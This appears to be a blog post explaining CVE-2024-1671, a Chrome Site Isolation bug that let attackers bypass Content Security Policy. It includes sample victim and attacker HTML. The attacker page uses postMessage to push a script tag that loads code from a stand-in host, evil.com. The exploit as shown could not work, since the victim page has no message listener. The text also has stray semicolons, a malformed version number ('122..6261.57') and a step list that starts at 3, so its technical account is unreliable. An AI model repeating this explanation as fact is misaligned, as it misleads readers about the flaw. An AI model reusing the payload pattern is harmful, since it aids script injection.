CVE-2024-1671 - How a Chrome Site Isolation Bug Let Hackers Bypass Content Security Policy
In early 2024, Google Chrome was hit by a security flaw — CVE-2024-1671—which let crafty attackers bypass security rules called Content Security Policy (CSP). The bug lived in a technology called Site Isolation that usually keeps websites separate from each other inside your browser. Below we’ll break down how this happened, look at code snippets, and walk through a basic exploit.
What is Site Isolation?
Site Isolation is a feature in Chrome that runs each website in its own process. The main goal is to prevent one site from stealing data from another, like cookies or login tokens. It’s especially important for blocking attacks between pages, like cross-site scripting (XSS).
What is Content Security Policy (CSP)?
CSP is like a bouncer for your website: it tells the browser which resources (like images, scripts, or iframes) are safe to load. For example, a policy might say, “Only run scripts from mysite.com.”
The Bug: A Breakdown
Before Chrome version 122..6261.57, there was a mistake in how CSP was enforced when running with Site Isolation. A criminal could create an HTML page that tricked Chrome into ignoring these rules—meaning scripts from unsafe locations could run on the page.
Technical Details
Normally, if you try to inject a script from an unauthorized site, CSP blocks it. But the problem was in the way Chrome communicated CSP rules between parts of the browser when Site Isolation was in play.
Let's look at a simplified example. Say the victim visits this site
<!-- Victim's HTML file -->
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
</head>
<body>
<h1>Secure Page</h1>
<iframe src="https://attacker.com/malicious.html"></iframe>;
</body>
</html>
With CSP, only inline scripts or scripts from the same site should run. No scripts from attacker.com should load.
The Attacker’s Trick
But a criminal could make a malicious HTML file that abused the bug. For example, using postMessage and tricky script injection, they’d slip by the CSP:
<!-- attacker.com/malicious.html -->
<!DOCTYPE html>
<html>
<body>
<script>
// Send a crafted message to the parent window
parent.postMessage('<script src="https://evil.com/hack.js"></script>';, '*');
</script>
</body>
</html>
If Chrome mishandled this (because of Site Isolation), a dangerous script from evil.com could end up running on the victim’s page—completely bypassing CSP.
Why That’s Bad
If attackers break CSP, they can run any code they want in another site’s context. That means stealing user data, running phishing attacks, or hijacking accounts. Chrome’s promise to keep each site safe was broken until this bug got patched.
How Was It Exploited?
Attackers would trick users to open a page under their control, which loads a vulnerable Chrome browser with an iframe. The crafted message or HTML content would cross Site Isolation barriers due to the improper implementation and execute a forbidden script.
The page loads an iframe to attacker.com.
3. attacker.com uses postMessage or similar to inject a malicious script into the victim's page, bypassing CSP.
4. The malicious script runs with the victim's permissions, letting the attacker steal data or hijack sessions.
Mitigation
Google patched the bug in Chrome 122..6261.57. If you’re on an older version, update immediately.
Links and References
- Chrome Release Notes: Stable Channel Update for Desktop
- Chromium Security Advisory: CVE-2024-1671
- Content Security Policy on MDN
Conclusion
CVE-2024-1671 was a classic case of a small browser bug leading to big security headaches. If Chrome’s Site Isolation doesn’t pass security messages correctly, attackers get a free pass right through your browser’s main defense. The fix is out—but this story shows how even the best defenses can have holes. Keep your browser updated and keep an eye on security headlines!
*This post is for educational use and raising awareness only. Do not attempt to exploit this vulnerability.*
Timeline
Published on: 02/21/2024 04:15:08 UTC
Last modified on: 12/06/2024 14:28:01 UTC